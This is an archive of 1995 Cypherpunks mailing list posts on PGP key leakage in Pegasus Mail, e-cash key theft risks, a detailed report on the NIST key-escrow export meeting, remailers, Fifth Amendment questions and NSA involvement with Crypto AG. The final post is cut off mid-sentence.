	So, I shouldn't take the opportunity to tell those non-technical people 
about the other "hole" they most likely have?  After all this only 
affects Windows users and it is a problem with Windows.

	Read what I wrote, I did not say the original post was in error about 
not queuing mail and saw no reason to repeat what appears to be a fact. 
And, if the non technical people don't know about the swap file 
problem, and just assume that if they don't queue mail they are no 
worse off, then they have been done a serious disservice.

	BTW, did you check it out?  Or just take what you saw as an 
opportunity to rant?

: 
: > 	Pegasus will indeed save your key with your message in the
: > outgoing queue.  This is a problem with the design of
: > pegasus, not with the design of the add on encryptor.  
: 
: How about saying something USEFUL, like yes or no to the
: question of whether sending WITHOUT queueing will make any
: difference? How about agreeing that if David Harris hopes to
: provide a useful interface to external "encryptors" he will
: have to do something about this?  How about cc'ing David?
: 
: Somebody else could as well point out that we're all full of 
: crap because we don't use Amigas, and while he might have a 
: point, it wouldn't be a very useful one.
: 

	Yes, it would have been a WONDERFUL opportunity to drop an O/S v. O/S 
troll on the list, notice I didn't.

	What I did do, was write up a problem description and mail it to David 
Harris.  This based on the likelihood that he doesn't read cypherpunks.

-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
A generation which ignores history has no past - and no future.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sun, 10 Dec 95 05:58:01 PST
To: jim bell <jimbell@pacifier.com>
Subject: Re: More FUD from First Virtual
In-Reply-To: <m0tOVMF-000927C@pacifier.com>
Message-ID: <ckmiLlOMc50eE2isEP@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


I think Adam's already covered the red herring of key length.   You can
use 4-billion-bit keys and it won't help prevent an attack based on
stealing secret keys.

Ed Carp hit the nail on the head when he wrote:  

> What is needed is better human management of keys.  Why 
> brute-force, why look for weak keys, why bother calculating how much 
> safer 2047-bit keys are rather than 1024-bit keys when someone can 
> look on your HD and find your secret key, when they can open your 
> desk drawer and find your pass phrase or password, when they can 
> guess that you used your wife's maiden name as your password?

What some people seem to miss is that, in the absence of hardware keys
(which I believe is the only workable long term solution for mass-market
cryptography), this sort of thing is just plain too easy.  If a Windows
cryptoprogram stores its secret keys in a known location, I can write a
Windows virus that flies through the net and steals zillions.  If the
program insists on making the users insert a floppy every time, the
program's perceived usability will go through the floor, and people will
find workarounds.  In any event, I could write a virus that sits in
front of the e-cash program and steals your keys when next you run the
e-cash program.  Software's just too easy to fool.  That's why I regard
the risk of catastrophe as being fairly large in software-based e-cash
schemes.

Jim, I never denied that some banks would be willing to take the risk
(in fact, read my post, I said just the opposite).  What I said was that
the assumption of the risk would carry a significant underwriting cost,
which would be, in essence, the "cost of anonymity" when comparing
payment systems.  

Finally Jim writes:

> Your arguments seem to only be qualitative, not quantitative.  Maybe that's
> why the other guy calls them "FUD."  

I'm saying that there will be a high underwriting cost for anonymous
cash, and that this will make it much more expensive than non-anonymous
payment systems.  To my mind, that's a discussion about quantity of
costs, not quality.  If you want me to give you numbers, I'm sorry, but
I can't -- I'm not a banker or an actuary, and a lot of leg work would
be required to come up with a precise number in any event.  If I were a
banker, however, I think I'd be too conservative to underwrite e-cash at
any price, and would suggest that you find a less risk-averse banker.  
-- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aq068@detroit.freenet.org (Troy M. Walsh)
Date: Sun, 10 Dec 95 07:37:35 PST
To: cypherpunks@toad.com
Subject: anti-copy
Message-ID: <199512101537.KAA04258@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




How would it be possible to create files that KNOW they are 
a copy?  I don't mean ones that look at the mod date, but a 
system that is near fool-proof.
	Just something I've pondered...

		Daark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Sun, 10 Dec 95 07:51:40 PST
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: The Elevator Problem
Message-ID: <9512101551.AA02550@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:
>
>
>On Sun, 10 Dec 1995, Daniel Miskell wrote:
>
>> There is an easy way to develop a secret key in front of any number of eves, 
>>be  they experts or not, without the eves knowing what the key is.  Even if 
>>they  tap your phone/comm line, etc.  There was an article in Discovery 
>>Magazine a  couple of years ago, talking about how to use photons and their 
>>randomness as  the perfect, uncrackable code.  Use of the photons aside, 
>>there was a key  generation method discussed, simple, yet secure enough to 
>>work out on a tapped  phone.  Let me root around.
>
>You must mean quantum crypto, by G. Brassard and C. Crepeau of U de Montreal.
>Requires a direct fiber optic line from pt. A to B, in order to be 
>secure, if I am not mistaken. Which makes it impractical for most people, 
>as there are usually switches (or whatever they're called) and more than one 
>line in between. Lets you use OTPs with your next-door neighbor though.

I think I was misunderstood.  I was not referring to the actual use of light 
in the communications process.  I was talking about the key generation method 
suggested in that article.  Of course the use of light is impractical for most 
- the need for direct fiberoptics aside, you have to be able to test a photon 
for its polarized orientation.  In any case, I dig on.

Regards,
Munster.

---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Sun, 10 Dec 95 11:07:21 PST
To: pfarrell@netcom.com
Subject: NIST GAK meeting writeup, LONG part 3 of 3
Message-ID: <199512101904.LAA20587@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

NIST Key Export meeting, December 5, 1995 Long version 
Part 3 of 3.

This covers the notes on agent criteria, and the 
industry presentations. 

Part 2 of three hasn't been written, it is supposed to 
address the issues related to interoperability. I 
decided it was better to get this part out than to 
wait.

Items on the criteria themselves that I think were under 
reported in my first reports:

Ed Appel: the LEA's are very interested in Criteria #5 
(two ended decryption) as they have more than 100 
international offices.

Miles Smid described a trick for meeting Criteria #5, 
if you encrypt the session key with your own public 
key, in addition to the key of your destination, and 
if you have escrowed your private key with an Escrow 
Agent, then nearly any approach meets criteria #5.

   *********
On agent criteria:
   *********

Geoff G. says that the discussions on agent criteria 
are simply a follow-on to the main criteria #3.
The criteria themselves have been spam'd to the list.
They are also available at url:
http:/www.isse.gmu.edu/~pfarrell/nist/escagent.html

There were a lot of reactions to the SECRET clearance
requirement, which they claimed was to handle
secure investigations (e.g. FISA). This has already
been discussed on the list, so I'll skip it here.

David Lesher asked a series of questions concerning 
the requirement that the Key Escrow Entity employ a 
person with a SECRET clearance. They included: what 
agency will issue the clearance? Who will authorize 
for the BI (background investigation)? Who will pay 
for it? Who does the existing RBOC clearances? Geoff 
dodged nearly all of them. He acknowledged that "they" 
will have to pay, but made no effort to define who 
"they" are.

Geoff said that they may want legislation support for 
protecting against illegal release of keys, failure to 
release, etc.

A fair number of the agent criteria would be considered
professional business practice (no single point of
failure, dual locations, etc.) if you thought that
escrowing keys was a good thing.

  *********
User/Industry presentations

Bill Sweet of TIS

Bill gave a presentation about his CKE product, and 
how hard he is working to "find a global solution."

This is actually the same product that Bill talked 
about in September when he worked for National 
Semiconductor. It was impressive then (private keys 
are NOT escrowed, only session keys, etc.) and is 
still not approved for export.

Bill talked about "information owners," they 
ultimately decide which security systems get deployed 
"in spite of various government requirements around the 
world." He said that "if rational key escrow systems 
are not offered, or do not adequately protect their 
information, owners will use unescrowed encryption 
from whatever sources available (Germany, et al)."

Bill talked about a UK University (Royal Holloway) 
study on UK/European needs for key escrow. He said 
that there was a lot of overlap with the NIST 
criteria, but that there were criteria that were 
judged as totally unacceptable. The first and loudest 
finding was:

"the use of the scheme should provide visible benefits 
to the user."

This begs the obvious question, what 
visible benefits to the user does GAK bring?

Two other interesting findings in the study were:
- - An entity with a warrant should not be able to 
  fabricate false evidence.
- - Abuse by either side should be detectable by the 
  other.

He suggested that these criteria be added to the NIST 
list of 10.

Bill went on to look at the NIST criteria. He said, 
concerning Criteria #3 (agents certified by US 
Government or reciprocal agreement), that "this is a 
show stopper!" because:
- -- no reciprocal agreements exist today, anywhere.
- -- what about countries where justice systems are 
   different, and what about where "these agreements are 
   not desirable (e.g. Nigeria, Mexico, Saudi Arabia, 
   Argentina, Poland, etc.)?
- -- even for NATO countries, agreements will be 
   different (Germany has data privacy laws, in Greece), 
   or we may not want to be reciprocal (in Greece, the 
   government likes to bug the opposition)

He also says that Criteria #7, 64-bit keys, is 
unacceptable. CE Infosys currently sells a PCMCIA (PC 
Card) encryptor that does triple-DES at T1 speeds. TIS 
uses it, and sells it in the US. [as an aside, I was 
told that they can import and resell them, but when 
one breaks, TIS can't ship it back to Germany for 
repairs. Sigh.]

Sweet had two recommendations:
- -- develop a tiered crypto policy, with hardware and 
   software under differing levels of rules,
- -- allow a pilot project, where TIS can sell VPN 
   (virtual private networks) using strong encryption. A 
   VPN is the use of the Internet as a private network 
   for a corporation by adding appropriate firewalls, 
   encryption, etc.


It seems to me that while TIS' CKE doesn't meet the 
criteria, it could be made to, with a few changes.
They'd have to change the design to allow GAK
for any one target (Criteria #5). This would mean
generating one DRF (i.e., LEEF) for each recipient 
as well as for the sender (as opposed to just for 
the sender). The neat thing about CKE is that each 
LEEF holds only the session key -- so you never 
give away your private key. (I think the government
really expects that we'll be willing to 
escrow our private keys. Fat chance!)

But this is a bit of a catch 22, because 
to follow all the criteria, you can't stop there.

- -- For each encryption, you generate a DRF for the 
   sender and each recipient

- -- For each DRF generated, you must have and check 
   a certificate chain for the chosen DRC and 
   refuse to encrypt unless all recipients and 
   the sender have validly certified (ie., USGovt
   approved) DRC public keys.

- -- Each receiving application must refuse to 
   decrypt unless every other recipient and 
   the sender have validly certified DRC
   public keys. This gets into the interoperability
   issues that I need to write up...

- -- I don't know how they can meet the revised #6. It
   seems to be designed specifically to break CKE.

To get govie approval, each DRC needs to meet all the
key escrow agent entity criteria. I'm really not at
all convinced that it is actually practical. This is
sad, because CKE is obviously designed with the spirit
of the government at heart, with just some modifications
to make it marketable. Guess TIS needs an Ireland office 
too.


Ken Mendelson of TIS

Ken gave a solid presentation describing how all of 
the Government's need for data about key escrow agents 
could be met with a commercial "vendor registration" 
approach instead of a Government mandated 
"certification" scheme. This would be in keeping with 
the current "spend less money, have less government 
bureaucratic rules" political climate. I have copies 
of his slides, I'd rather not type them in. With any 
luck, he'll put them up on the TIS web site url: 
http://www.tis.com

Dorothy Denning of Georgetown University

Dorothy Denning gave a presentation on an article that 
will be published in the March 96 Communications of 
the ACM. It analyzes currently available products (and 
vapor products) and sees how well they meet Criteria 
#5. It says that eight of the sixteen approaches that 
she surveyed currently meet Criteria #5. She lists her 
web page as http://www.cosc.georgetown.edu/~denning, 
but as of Sunday 12/10, the text is not available.

Melanie Janin, US Council for International Business

Ms. Janin's speech presented the US Council for 
International Business' comments on GAK. They are a NY 
based trade group, representing 300 clients. They 
don't like GAK. She called for a coherent policy on 
all encryption. Major topics in the presentation 
include:
- - free choice
- - open to the public
- - international acceptance
- - flexibility of implementation
- - User key management
- - Key escrow (where they "embrace key escrow as one 
  possible method of managing encryption keys.")
- - Liability

Ed Scheidt, Tecsec

Presented both comments on the criteria and his 
company's VEIL and Export VEIL Version 2.0 products. 
He raised a number of points, including:
- - how do we protect our commercial information unless 
  we have the best cryptography?
- - we need "constructive key management technology" to 
  manage keys, key splits, and different algorithms for 
  extended data separation.
- - solution must address issues such as international 
  trust in a key escrow.

He said that his "Export VEIL 2.0" product meets "the 
intent of 11/95 export criteria today."

Daniel Weitzner of CDT

Mr. Weitzner agreed to shorten his presentation so 
that he could yield some time to VTW.

He opened by pointing out that while the schedule said 
both he and Jerry Berman were supposed to talk, Jerry 
was too busy to make the meeting. "Jerry is out 
defending pornographers, so I'll be here defending 
terrorists."

I expect that his text will be on CDT's webpage, url: 
http://www.cdt.org. I'll just enter the key points.

The first thing he said is that "this is the wrong 
forum" and that "the [NIST] process will not work." He 
proposed an open, privately sponsored forum to develop 
alternatives that will work.

"The NIST proposal will not provide adequate security, 
privacy, promote secure communications worldwide, or 
guarantee user privacy." Major issues are:
- - Inadequate security
- - No viable policy framework for the long-term
- - Hinders the deployment of globally interoperable 
  secure systems
- - not necessarily voluntary
- - not viable in the marketplace
- - no constitutional privacy protections
- - will not meet the needs of law enforcement, since it 
  will "not deny criminals or terrorists access to 
  strong encryption, the stated objective of the 
  policy."

Shaber Safdar, Voters Telecommunication Watch

Described the results of an Internet-based, non-
scientific survey that the VTW recently made. Not 
surprisingly, those who replied were overwhelmingly 
against the NIST proposal. I don't have the slides, 
but VTW has a website with most of their information. 
The url is http://www.vtw.org

There were 26 respondents to the survey. 24 out of 26 
said that they would never buy products with law 
enforcement access. 16 out of 24 are already using 
security products.

He described a Technology Pledge that VTW is 
presenting to politicians (available at url: 
http://www.vtw.org/pledge/) and stated that Rep. 
Ronald Wyden (D-OR) signed the pledge with pro-
freedom, pro-market answers.

David Sobel, EPIC

As expected, EPIC doesn't like much about the NIST 
proposal. Their comments are on their web page, url:
http://www.epic.org/crypto/EPIC_Statement.html

A key statement is "Given the reality that users are 
unlikely to adopt key escrow systems on a voluntary 
basis, we believe that the current policy will result 
in the eventual prohibition of non-escrowed products. 
Indeed, documents released to EPIC under the Freedom 
of Information Act (FOIA) reveal that NSA and FBI 
concluded nearly three years ago that

	'Technological solutions such as they are, will 
     only work if they are incorporated into all 
     encryption products.'"

Major points 
- --Public comment is frequently solicited but never 
  heeded.
- --Relevant information has not been released. 
- --The proposal conceals the attempt to expand 
  wiretapping capability 

As a result, EPIC proposes the following Policy 
Recommendations

- --Relax export controls on encryption and permit the 
  free flow of encryption products across national 
  borders
- --Withdraw FIPS 185 (the Clipper standard for voice, 
  fax,...  and low speed data networks in the 
  federal government)
- --Remove "cryptology" from items that may be 
  classified ...  under executive order
- --Do not fund the Telephone Carrier Compliance Program         
  (the "Digital Telephony" proposal)
- --Do not permit the use of classified algorithms for         
  public networks
- --Examine the activities of the National Security 
  Agency ... since passage of the Computer Security 
  Act of 1987.

NOTE: during Mr. Sobel's discussion, a FBI 
representative sitting at the head table said  that 
the issues addressed by key escrow are "not just 
wiretapping, they include search and seizure of all 
stored media." I was not able to identify the person. 
He was sitting at Ed Appel's seat, but did not have a 
namecard. No one sitting near me recognized him 
either.

Padgett Petersen, Lockheed Martin

Noted Internet personality, Padgett Petersen took a 
rarely held position, he spoke as a Security officer 
of Lockheed Martin, rather than speaking as a private 
net-citizen.

He said that "these criteria are acceptable and can be 
made to work." He also said that "without US 
agreements, there is no reason to be concerned with 
export." Lockheed Martin was looking forward to 
participating in using and buying the escrowed 
products that will hit the market as a result of this 
process.

Robert Hollyman, Business Software Alliance

Mr. Hollyman said that "the facts are clear, companies 
are unanimous against" the NIST proposal. His members 
agree that:
- - security is critical
- - 40 bit is not viable
- - the 1992 government review requires a change in 
   policy.

He recommended:
- -- immediate approval of DES or equal strength 
   alternative for export.
- -- encourage companies to build encryption software by 
   submitting code to NIST (under non-disclosure) for 
   review
- -- add two bits every three years to allowable key 
   lengths in recognition of Moore's law. He called this 
   a COCA allowance (cost of cracking algorithms).
- -- removal of restrictions on interoperability because 
   they are artificial and antithetical to the Global 
   Information Infrastructure.

He stated that the current criteria are vague, and 
will take years for approval. Yet he notes that in 
industry, the average life cycle of software is 18 
months.

Alex McIntosh, PC Security

PC Security sells key management systems. Shell is a 
customer. He addresses a couple of areas that his 
commercial customers ask. 

The first question is "why encrypt?" He said that the 
answer is to protect confidential data. These data 
include email, PC files, and archival data. 

This leads to the obvious question, why use key 
management? The two separate answers are to have  
operational backup and to allow compliance with 
internal and external law enforcement.

He said that he has a surprise for the NIST folks 
concerning key escrow agents. The corporate customer 
is the key escrow agent.

Other key observations:
- -- Companies, such as Shell, often do business in 
   countries where they can not trust the government.
- -- Shell handles over a million email messages a day. 
   This defines engineering requirements for any system 
   to meet.
- -- Liability is a huge issue, and the amounts are 
   huge. Geologic information, market strategies, etc. 
   are worth staggering amounts of money. The "US 
   Government can NOT cover Shell's liabilities."

Doug Miller, Software Publishers Association

Mr. Miller said that his members need immediate relief 
from the current encryption export policies. "our 
members are poised, but cannot leap, because of the 
barriers that U.S. cryptographic policy continues to 
impose." He wants to be able to export 56-bit DES. His 
position paper says, "we believe the discussion should 
also include assessment of the exportability of 
products employing the DES algorithm. DES-strength 
(56-bit) products can compete with 179 foreign 
products (80 of which are software products) that 
employ DES. Liberalization of the export restrictions 
of software with encryption capabilities is essential 
if U.S. companies are to compete with strong, widely 
available non-escrowed products."

Viktor Hampel, Hampel Consulting

Proposed "a 'Consumer Protection Act for Digital 
Products' to support electronic commerce and to 
control the increasing abuse and lack of security on 
the national information highways." A copy can be 
obtained from Hampel Consulting, 1515 Jefferson Davis 
Highway, Crystal Square Suite 913, Arlington VA 22202-
3312.

In his remarks, Mr. Hampel said that trust is 
important between business. Business worries about 
issues as varied as what accountability is in the 
system and how much is the per minute interest on a 
billion dollar money transfer? These cause business to 
need solutions that NIST hasn't raised.

He recommended that a public key infrastructure be 
included into the Uniform Commercial Code.

Closing comments.

Mike Nelson noted that the meeting had some time for 
floor questions.

He was asked what is the timeframe for finishing the 
process. He danced, saying that promising a fixed date 
for policy decisions is bad for your career, but 
thought it would be done in a couple of months.

Someone asked about the "Personal Use" export process 
(the one that will allow you to export PGP on a laptop 
computer for personal use, and that was promised for 
"in a couple of weeks" at the September NIST meeting). 
They said that it is about to go to the Federal 
Register, and should be available within weeks.

Nelson was asked about foreign escrow agents. He said 
that "if there exists bilateral diplomatic agreements, 
then the US will allow specification of Foreign Escrow 
agents." [Of course, no such agreements exist now.]

Ed Appel of the White House said that the intent is to 
make export "as easy as 40-bit" is under the existing 
policies. The existing export policies will continue.

He also said "so far, we are only controlling export" 
and that "the government has very strong cryptography 
available to them, so they are not worried about 
export." He said they hope to control export in two 
ways, first by applying the combined purchasing power 
of the US Government to encourage the market, and by 
controlling export.

	 *********

After the meeting closed, I invited both Mike Nelson 
and Ed Appel to the next DC Cypherpunks meeting. 
Somehow I expected it when they declined.

     ********
A note on quoting within this document: I did not take a 
tape recorder to the meeting. Words in quotes were taken
from either my hardcopy of handouts, words in documents
on cited webpages, or from my notes. I tried hard to 
keep the words accurate and in context. There may be some
cases where my quotes are incorrect. If I've misquoted
anyone, it is not deliberate, and if told, I'll post
corrections.

Pat

Copyright (c) 1995, Pat Farrell.
Permission granted to electronically redistribute, provided
it is transmitted in the whole and unaltered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMMsugLCsmOInW9opAQGWSAP/QC3Xja8kE56XGximmiiIVEv3ihJI1uY5
2eWZSVUGOxATc3jbwtLS5bqmkDnSXhQaaD6Slk/zA9IGlNhzi4tMV1xsrKwj4l4d
0KefEWOTinVze+6SQFsIVizGb9WzRaTrGwCV9RY7RRbC0dYa+cb21JXvlZOxYk/Q
wGfkSY5/H0Y=
=hJvT
-----END PGP SIGNATURE-----



Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sun, 10 Dec 95 08:45:37 PST
To: cypherpunks@toad.com
Subject: Is it possible?
Message-ID: <Pine.LNX.3.91.951210113717.31381A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Suppose I have the source of a C program that I would like to distribute 
on the Internet. This program computes some data (perhaps attempting 
to do a partial brute force) and sends its results to a server. The 
problem is someone might modify the source to simply contact the server saying 
"ok, my part of the brute force failed" and not even do anything. How can I be 
sure that the source has not been modified from the original distribution 
before it is compiled?

My original plan was to compute many digits of PI using the new Plouffe 
formula (allows you to compute any Hex digit of PI in linear time) but
perhaps trying to brute force things in this way isn't such a bad idea.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Sun, 10 Dec 95 12:07:54 PST
To: cypherpunks@toad.com
Subject: Re: anonymous remailer
In-Reply-To: <UPMAIL03.199512100623550668@msn.com>
Message-ID: <199512102002.MAA16196@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Fred Nix <FredNix@msn.com> wrote:
> Hey...
>
>    How do I gain access to the remailer?
>
> Thanks!
>
> Fred Nix


Since you are using Micro$oft Network, you must pay the extra 10% fee to
Bill Gates or he won't give you access to use the remailer.

Just kidding.  But seriously, if online time is so expensive that you don't
feel you can do a simple lycos.com search for "remailer", then you really
need to find a cheaper Internet service provider.

That said, point your web browser at the following:

http://www.stack.urc.tue.nl/~galactus/remailers/
http://www.cs.berkeley.edu/~raph/remailer-list.html
http://www.well.com/user/abacard/remail.html
http://electron.rutgers.edu/~gambino/anon_servers/anon.html

And learn to use Lycos. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Glenn Johnson <atlgator@mindspring.com>
Date: Sun, 10 Dec 95 09:34:03 PST
To: cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house? :)
Message-ID: <199512101733.MAA04061@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


On the lighter side (not to be taken seriously):

Q: What if Alice and Bob are siamese twins?

Could we imagine a constitutional test that turns on whether a majority of
organs are shared?  Could the dissent cite the fact that some of the shared
organs are not vital?

Q2:  Better yet, what if Alice and Bob were only 2 of say 6 distinct
personality manifestations exhibited by one physical person?  Again, would
we need to arrange for a consensus among at least 2 more personalities to
form a majority, thus entitling the collective to shared privacy?

The answers to these and other exciting questions on the next episode of 
"Exhaust that Thread."



At 01:27 AM 12/10/95 -0500, you wrote:
>On Fri, 8 Dec 1995, Black Unicorn wrote:
>
>> On Thu, 7 Dec 1995, Jeff Weinstein wrote:
>> 
>> > Black Unicorn wrote:
>> > > 
>> > > On Thu, 7 Dec 1995, sameer wrote:
>> > > 
>> >   How about if Bob had a contractual agreement with Alice to keep his
>> > key secret?
>> 
>> Then as a defense attorney, I would argue that Bob had an obvious 
>> expectation of privacy with Alice, and that the fact that he relayed this 
>> key to Alice only under those circumstances represents a definite 
>> expression of his intent to keep the key private, thus triggering 4th 
>> amendment protections.  My view is that this would be a very strong argument.
>
>Bob's Fourth Amendment rights are not triggered by his contract with 
>Alice.  Alice can be compelled to give up the key (by testimony or 
>production) and giving up that key does not tend to incriminate *Alice* 
>in a violation of law.  Alice can't invoke Bob's rights against 
>self-incrimination for obvious reasons:  Alice isn't Bob.
>^^^^
>EBD
>
>
>> 
>> Note that this is an academic opinion, not a legal one as I am not being 
>> paid.
>> 
>> >
>> > 	--Jeff
>> > 
>> > -- 
>> > Jeff Weinstein - Electronic Munitions Specialist
>> > Netscape Communication Corporation
>> > jsw@netscape.com - http://home.netscape.com/people/jsw
>> > Any opinions expressed above are mine.
>> 
>> ---
>> My prefered and soon to be permanent e-mail address: unicorn@schloss.li
>> "In fact, had Bancroft not existed,       potestas scientiae in usu est
>> Franklin might have had to invent him."    in nihilum nil posse reverti
>> 00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
>> 
>> 
>
>Not a lawyer on the Net, although I play one in real life.
>**********************************************************
>Flame away! I get treated worse in person every day!!
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Dec 95 03:30:27 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <199512101130.MAA12736@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On  9 Dec 95 at 21:43, Jeff Hupp wrote:

> On  9 Dec 95 at 18:29, Siberia wrote:

> : Okay, here's how I understand things with PGP and Pegasus.
> : You have two  options with Pegasus depending on the set-up
> : options you choose.  You can either send upon completion of
> : your out-going email, or you can have your mail queued
> : until you press the send out-going mail button.  The actual
> : PGP process does not occur until you actually send the
> : mail.  So the answer would be: don't queue your mail.

> 	That's not really a solution in the Windows environment, if
> you have a swap file, you never know what gets written out
> to it.  The solution is run w/o a swap file or run an
> encrypted file system.  I run an encrypted file system.

Oh, PLEASE! Do you HAVE to go and mix up two completely
different issues? Aren't the nontechnical people trying to
follow these things likely to be confused enough without your
adding to that confusion? For every person who really 
understands the technical issues there are probably a thousand 
or ten thousand who are just trying to *use* the stuff without 
stepping into a deep hole.

An OS swap file is one kind of hole.  What Siberia is writing 
about is ANOTHER type of hole. If I wipe my swap file after 
each use of my machine and don't know that Pegasus is doing 
this, or think that because of what you wrote I'm no worse off, 
I've been done a serious disservice.

> 	Pegasus will indeed save your key with your message in the
> outgoing queue.  This is a problem with the design of
> pegasus, not with the design of the add on encryptor.  

How about saying something USEFUL, like yes or no to the
question of whether sending WITHOUT queueing will make any
difference? How about agreeing that if David Harris hopes to
provide a useful interface to external "encryptors" he will
have to do something about this?  How about cc'ing David?

Somebody else could as well point out that we're all full of 
crap because we don't use Amigas, and while he might have a 
point, it wouldn't be a very useful one.

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMq8MUjw99YhtpnhAQHA2wIAo72mzD7yNYy2btraeMg92hkekW/ik/hR
SILC97a/gTGtZJiHV0MLcGETgZL51kFPQ3pRx+BGZl5g8JdRAQ2ZpQ==
=gOtF
-----END PGP SIGNATURE-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 10 Dec 95 10:57:49 PST
To: Greg Broiles <cypherpunks@toad.com
Subject: Re: GAK and self-incrimination?
Message-ID: <199512101959.NAA14976@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Sun, 10 Dec 1995 02:57:36 -0800
> To:            cypherpunks@toad.com
> From:          Greg Broiles <gbroiles@darkwing.uoregon.edu>
> Subject:       Re: GAK and self-incrimination?
> Cc:            tcmay@got.net

> 
> Tim May writes:
> 
> >Consider this hypo: I send an encrypted message to a partner in crime
> >containing plans for future crimes and descriptions of past crimes. I don't
> >GAK the message. The government prosecutes me under the Anti-Terrorism and
> >Child Protection Act of 1997.
> >
> >My defense? That GAKKing the message would be tantamount to incriminating
> >myself, which the Fifth Amendment protects me against.      
> 
> The Fifth protects you against *compelled* self-incrimination - in
> particular, the right to be free from the "cruel trilemma" of
> 
>         o       conviction of a substantive crime, based on your
>                 (true) testimony
>         o       conviction of perjury, for lying when asked to incriminate
>                 yourself
>         o       contempt of court sanctions, for refusing to answer
> 
> but your hypo doesn't seem to create that forbidden situation. In
> particular, you're free to simply not send the message at all. 

I don't believe that that would be a consideration.  Wasn't there a 
court case a few years ago, in which a convicted criminal sued the 
government, charging that filling out one of those forms that you 
have to fill out when you buy a gun was a violation of his 5th 
amendment rights?  What ever happened to that case?

I also think that, besides the obvious 5th amendment problems, there 
would be a 1st amendment problem - if you *had* to use GAK to 
communicate, that would be an impermissible restriction on your 1st 
amendment rights.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 10 Dec 95 09:44:15 PST
To: cypherpunks@toad.com
Subject: NSA rigs Crypto machines according to Balto Sun
Message-ID: <v02130504acf0c75190a9@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Most of us might believe that the holes in Netscape's encryption
software were simply the result of sloppy engineering. That was
the public story. A story from today's Baltimore Sun  (Sunday
December 10, 1995) gives more reasons to be paranoid.

The Baltimore Sun has been running a long series of articles on
the National Security Agency. Some of the earlier ones have been
largely positive and filled with stories of intelligence coups.
Today's story describes several reasons why one might believe
that the NSA was party to a plan to rig the machines of the
Swiss company, Crypto AG, so that the messages could be read by
those who knew the game. Crypto AG sells its machines to other
countries around the world who believe that the Swiss are
neutral vendors of superior technology that wouldn't have such
holes.

The clearest link, in my mind, was the minutes from a design
meeting at Crypto AG which was attended by an NSA cryptographer,
Nora Mackebee. (She is now 55, retired and living at what the
Sun calls a "Howard County horse farm.") But there are reasons
to wonder about this link. Motorola was also part of the list.

Also one employee got in a legal battle after being fired. The
details were settled a few days before company engineers were
scheduled to testify "that they believed the machines were
altered."

More anecdotal evidence was offered by someone who is listed as
a "longtime colleague" of Dr. Kjell Ove Widman, the Swedish
mathematician who "had total authority over Crypto algorithms."
The colleague said that Widman would often travel to Germany and
then return with design instructions. The impression was given
that Crypto could only use an algorithm if it was approved.

But approval is not, in my mind, proof of a secret attempt to
read messages. I believe that the NSA probably did more to
strengthen DES than weaken it during the classified design
process at IBM. But I only have the work of Biham and Shamir to
base these conclusions upon. Perhaps the machines were altered
to make them stronger for western firms using them? The Mackebee
meeting occurred in 1975 during the height of the Cold War. The
Soviets were grabbing Western technology left and right.

Of course, the Sun also reports that Crypto AG "denied that
intelligence agencies had ever rigged its machines." (The words
in quotes are the Sun's, not Crypto AG's.)

So, is this what happened at Crypto AG? Is this what happened at
Netscape? We may never know for certain, but there is a final
warning for the folks at Netscape that is buried in the Sun's
article about Crypto AG:

   "Meanwhile, though the company has hastened to reassure its
    customers, business has declined and employees have been laid off."



-=-=-=-=-

There are two more articles in the series. Tuesday's will report
